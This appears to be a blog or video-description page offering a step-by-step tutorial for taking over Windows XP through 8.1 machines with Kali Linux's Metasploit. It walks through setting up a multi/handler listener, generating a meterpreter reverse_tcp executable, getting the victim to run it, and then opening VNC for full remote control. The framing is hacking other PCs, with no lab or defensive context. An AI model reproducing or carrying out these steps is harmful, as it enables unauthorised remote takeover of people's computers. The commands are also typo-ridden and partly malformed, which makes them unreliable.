Search bar of flipkart

windows XP/8/8.1/7/vista hacked using kali linux "MSFCONSOLE" hacking pc desktop remote connection. YJTUTORIALS



In this video i have hacked windows xp u can use same steps to hack other versions like hacking pc using remote connection
xp,8,8.1,7,vista watch and enjoy. "please turn on your annotations"
these are the steps.comment for any errors/problems...
in terminal type msfconsole.
2. after the msfconsole has been loaded type -- use exploit/multi/handler
3. set LHOST 192.168.1xx.xx 192.168... is ur kali machine ip address. to find your machine open new terminal type ifconifg in the result u will see inet address . dat will be ur machine ip address
4. set LPORT 4321
5. after 4th step minimize ur terminal and open ur new terminal.
type in msfpayload windows/meterpreter/reverse_tcp LHOST=machine ip address LPORT=4321 x/root/attack.exe
6. open ur minimized terminal .
again type in d msfconsole .....d terminal u have minimized restore it... 
type dis - set payload windows/meterpreter/reverse_tcp
7. later as shown in video transfer file to ur windows machine
8. excecute the attack.exe file.
9. in the terminal type exploit as per shown in video
10. ur done u have got full access to the windows machine........
u can use this command to get access as same as team viewer software gives u 
d command is -- run vnc
Please watch dis video so that u will understand how to execute the description!IF any errors in executing the command shown in description..
i request u to watch the video
twitter follow us..... https://twitter.com/WhitehatLinux
linuxtutorials97@gmail.com
email me for more info
comment for any more tutorials you want.
Subscribe to our youtube channel!



No comments: